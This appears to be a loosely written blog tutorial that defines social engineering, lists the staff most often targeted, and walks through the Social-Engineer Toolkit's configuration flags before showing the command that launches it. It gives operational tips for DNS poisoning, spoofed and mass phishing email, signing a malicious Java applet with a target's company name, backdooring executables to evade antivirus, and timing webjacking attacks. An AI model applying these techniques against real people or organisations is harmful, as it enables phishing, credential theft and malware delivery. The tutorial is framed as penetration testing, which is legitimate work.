In the world of network security, there is a principle which says "the strength of a chain hanging from or located at the junction of the weakest. What it means is a chain with a bond as good as anything if there is a weak bond is the bond which limits its power. In the world of network security, the weakest component is human. Although a system has been protected by the hardware and software that cangih the antidote attacks such as firewalls, anti-virus, IDS / IPS, and so forth-but if the people who operate it fails, then all the equipment it has no meaning. The cyber criminals know this, so then they started using a particular technique called the "social engineering" to get the important and crucial information that is stored in secret by a system through a human.
Security or security is dependent on trust. Good faith in terms of authentication and protection. It has been generally agreed that as part of the weakest bond in a security chain, a natural human nature to believe the words of other people easily create a gap in security. Do not rely on the system's security forces, but it all depends on the human to keep a company or an information is maintained.
TARGET
The main purpose of doing social engineering with the goal of hacking is similar in outline, is to get that should not be allowed access to a system or information to commit fraud, infiltration, surveillance, identity theft, or to destroy a system or network. Usually the target of social engineering in the areas of provider network is a telephone, answering machine, large corporations, financial institutions, government companies, and hospitals.
Statistically, there are 5 (five) groups of individuals who often become victims of social engineering attacks, which are:
1. Receptionist and / or the Help Desk of a company, because it is the entrance into the organization's relative has a data / information about the personnel who work in the intended environment;
2. Technical support from the division of information technology - particularly those serving the leadership and management of the company, because they usually hold the key to access critical data and information confidential, valuable, and strategic;
3. System administrators and computer users, because they have the authority to manage passwords and account management of all users of information technology in the enterprise;
4. Partner or vendor of the target company, because they are the ones who provide a variety of technology and its features and capabilities that are used by all management and employees;
5. New employees who still do not quite understand about the procedures at the company's information security standards.
so we can know that Social engineering is the technique of how to obtain confidential information from an individual owner of that information. while Social Engineering Toolkit >>>>>>>
The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.
Beginning with the Social Engineer Toolkit
The brains behind SET is its configuration file. SET by default works perfect for most people however, advanced customization may be needed in order to ensure that the attack vectors go off without a hitch. First thing to do is ensure that you have updated SET, from the directory:
> Open Your terminal
Once you’ve updated to the latest version, start tweaking your attack by editing the SET configuration file. Let’s walk through each of the flags:
Looking through the configuration options, you can change specific fields to get a desired result. In the first option, you can change the path of where the location of Metasploit is. Metasploit is used for the payload creations, file format bugs, and for the browser exploit sections.
The Ettercap section can be used when you’re on the same subnet as the victims and you want to perform DNS poison attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server running.
Setting the SENDMAIL flag to ON will try starting SENDMAIL, which can spoof source email addresses. This attack only works if the victim’s SMTP server does not perform reverse lookups on the hostname
When setting the WEBATTACK_EMAIL to ON, it will allow you to send mass emails to the victim while utilizing the Web Attack vector. Traditionally the emailing aspect is only available through the spear-phishing menu however when this is enabled it will add additional functionality for you to be able to email victims with links to help better your attacks.
The Java Applet Attack vector is the attack with one of the highest rates of success that SET has in its arsenal. To make the attack look more believable, you can turn this flag on which will allow you to sign the Java Applet with whatever name you want. Say your targeting CompanyX, the standard Java Applet is signed by Microsoft, you can sign the applet with CompanyX to make it look more believable. This will require you to install java’s jdk (in Ubuntu its apt-get install sun-java6-jdk or openjdk-6-jdk).
The AUTO_DETECT flag is probably one of the most asked questions in SET. In most cases, SET will grab the interface you use in order to connect out to the Internet and use that as the reverse connection and IP address. Most attacks need to be customized and may not be on the internal network. If you turn this flag to OFF, SET will prompt you with additional questions on setting up the attack. This flag should be used when you want to use multiple interfaces, have an external IP, or you’re in a NAT/Port forwarding scenario.
By default the SET web server listens on port 80, if for some reason you need to change this, you can specify an alternative port.
When using the payload encoding options of SET, the best option for Anti-Virus bypass is the backdoored, or loaded with a malicious payload hidden in the exe, executable option. Specifically an exe is backdoored with a Metasploit based payload and can generally evade most AV’s out there. SET has an executable built into it for the backdooring of the exe however if for some reason you want to use a different executable, you can specify the path to that exe with the CUSTOM_EXE flag.
The web server utilized within SET is a custom-coded web server that at times can be somewhat slow based off of the needs. If you find that you need a boost and want to utilize Apache, you can flip this switch to ON and it will use Apache to handle the web requests and speed your attack up. Note that this attack only works with the Java Applet and Metasploit based attacks. Based on the interception of credentials, Apache cannot be used with the web jacking, tabnabbing, or credential harvester attack methods.
In some cases when your performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well however there will be an “untrusted” warning when a victim goes to your website.
The webjacking attack is performed by replacing the victim’s browser with another window that is made to look and appear to be a legitimate site. This attack is very dependant on timing, if your doing it over the Internet, I recommend the delay to be 5000 (5 seconds) otherwise if your internal, 2000 (2 seconds) is probably a safe bet.
> Run
root@justview:/pentest/exploits/set# ./set
open your browser
so we have conclusion that social engineering is ways how to get information of victim and social engineering tool kit is tools who is doing job.
